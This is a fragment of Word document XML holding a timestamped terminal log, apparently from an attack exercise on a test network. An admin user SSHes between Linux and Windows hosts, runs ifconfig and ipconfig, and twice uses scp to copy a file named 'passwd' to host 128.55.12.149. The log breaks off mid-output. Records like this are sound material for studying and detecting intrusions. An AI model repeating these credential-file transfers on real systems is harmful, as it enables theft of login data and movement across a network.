    <w:p w14:paraId="6A0F8422" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>The authenticity of host '128.55.12.118 (128.55.12.118)' can't be established.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704CEC2F" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>ECDSA key fingerprint is 13:eb:62:54:d9:07:99:3f:8e:07:d9:b5:cc:a9:3e:46.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="520DAD20" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Are you sure you want to continue connecting (yes/no)? yes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B78DBF" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Warning: Permanently added '128.55.12.118' (ECDSA) to the list of known hosts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C5D286" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">admin@128.55.12.118's password: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="252A1528" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-31-generic x86_64)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7A5507" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="221CE1E9" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> * Documentation:  https://help.ubuntu.com/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49135E7E" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="071CE01E" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  System information as of Fri May 10 14:20:56 EDT 2019</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79CE984A" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05B55456" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  System load: 2.5                Memory usage: 59%   Processes:       258</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="187107B0" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  Usage of /:  3.7% of 885.13GB   Swap usage:   0%    Users logged in: 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4340B75D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24C74F1E" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  Graph this data and manage this system at:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D32EDB2" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    https://landscape.canonical.com/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D57730" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="194A6F1D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Your Hardware Enablement Stack (HWE) is supported until April 2019.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57957CFB" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Last login: Fri May 10 14:20:56 2019 from 128.55.12.122</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE89409" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2183D17F" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>14:23</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5908BFC4" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>admin@ta1-trace-2:~$ scp passwd admin@128.55.12.149:.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB198BF" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>The authenticity of host '128.55.12.149 (128.55.12.149)' can't be established.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B3DA95C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>ECDSA key fingerprint is SHA256:d88CDDU3/VKCUWPWUfaKYqG/XSMWBkFhAHS1tLHJTig.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2796FD53" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Are you sure you want to continue connecting (yes/no)? yes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668116E4" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Warning: Permanently added '128.55.12.149' (ECDSA) to the list of known hosts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01581C72" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">admin@128.55.12.149's password: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C47FF4E" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">passwd                                                                                                                                                                                                                                                                                                    100% 2696     2.6KB/s   00:00    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="611A2E86" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4477B231" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>14:42</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EFBEC59" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>admin@ta1-trace-2:~$ ifconfig</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A6F769" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">em2       Link encap:Ethernet  HWaddr 10:98:36:af:cf:14  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D6E5242" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">          inet6 addr: fe80::1298:36ff:feaf:cf14/64 Scope:Link</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C568305" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DED36E0" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">          RX packets:754100459 errors:0 dropped:0 overruns:0 frame:0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="205F041F" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">          TX packets:780658432 errors:0 dropped:0 overruns:0 carrier:0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782DDD72" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">          collisions:0 txqueuelen:1000 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1295437F" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">          RX bytes:123758856641 (123.7 GB)  TX bytes:308227812842 (308.2 GB)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="034B13F7" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">          Interrupt:17 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7249A060" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D9A852E" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">em2.10    Link encap:Ethernet  HWaddr 10:98:36:af:cf:14  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF3FB51" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">          inet addr:10.0.6.68  Bcast:10.0.7.255  Mask:255.255.252.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59FD48D0" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">          inet6 addr: fe80::1298:36ff:feaf:cf14/64 Scope:Link</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64DF2D1A" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D21A9B" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">          RX packets:4254242 errors:0 dropped:0 overruns:0 frame:0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7753962E" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">          TX packets:172976 errors:0 dropped:0 overruns:0 carrier:0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB555CD" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">          collisions:0 txqueuelen:1000 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A97350" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">          RX bytes:725848148 (725.8 MB)  TX bytes:455099178 (455.0 MB)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B995BD" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18B226B0" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">em2.128   Link encap:Ethernet  HWaddr 10:98:36:af:cf:14  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0582FC2B" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">          inet addr:128.55.12.118  Bcast:128.55.12.255  Mask:255.255.255.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D10A304" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">          inet6 addr: fe80::1298:36ff:feaf:cf14/64 Scope:Link</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524A7611" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA04B10" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">          RX packets:742461253 errors:0 dropped:0 overruns:0 frame:0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596C52F8" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">          TX packets:731807120 errors:0 dropped:0 overruns:0 carrier:0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB7C9BD" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">          collisions:0 txqueuelen:1000 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C322BD" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">          RX bytes:105740977041 (105.7 GB)  TX bytes:298320034728 (298.3 GB)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D1886A7" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00F26DEB" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">lo        Link encap:Local Loopback  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F6F7B27" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">          inet addr:127.0.0.1  Mask:255.0.0.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D47C82" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">          inet6 addr: ::1/128 Scope:Host</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CB95779" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">          UP LOOPBACK RUNNING  MTU:65536  Metric:1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D5DAB66" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">          RX packets:2542 errors:0 dropped:0 overruns:0 frame:0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D855E38" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">          TX packets:2542 errors:0 dropped:0 overruns:0 carrier:0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="507C4F0D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">          collisions:0 txqueuelen:1 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF19537" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">          RX bytes:330298 (330.2 KB)  TX bytes:330298 (330.2 KB)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF6439D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B8C8F57" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>14:43</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A63C404" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Ssh admin@128.55.12.109</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006384E7" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>admin@TA1-FIVEDIRECTI C:\Users\admin&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04EE5548" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>admin@TA1-FIVEDIRECTI C:\Users\admin&gt;dir</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="464A69F3" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>05/10/2019  11:06 AM             2,696 passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FCF595E" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40A446C9" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>14:45</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="793C6C7A" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">admin@TA1-FIVEDIRECTI C:\Users\admin&gt;scp passwd admin@128.55.12.149                                                             </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E1A6DE6" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        1 file(s) copied.    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F6C17B" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73697CF9" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>14:46</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30EC4EE0" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">admin@TA1-FIVEDIRECTI C:\Users\admin&gt;ipconfig                                                                                   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="749AA8EF" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C4FD68D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Windows IP Configuration                                                                                                        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE6D7A2" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BEB37CC" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79C84DB2" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ethernet adapter Ethernet:                                                                                                      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14599589" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BCA6396" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   Connection-specific DNS Suffix  . :                                                                                          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5B61E3" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   Link-local IPv6 Address . . . . . : fe80::41af:3658:e3d9:fd2a%2                                                              </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C706A1" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   IPv4 Address. . . . . . . . . . . : 10.0.6.59                                                                                </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2855F4B4" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   Subnet Mask . . . . . . . . . . . : 255.255.252.0                                                                            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0499694D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   Default Gateway . . . . . . . . . :                                                                                          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C69532B" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FA841D5" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ethernet adapter Ethernet 3:                                                                                                    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F25E79" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
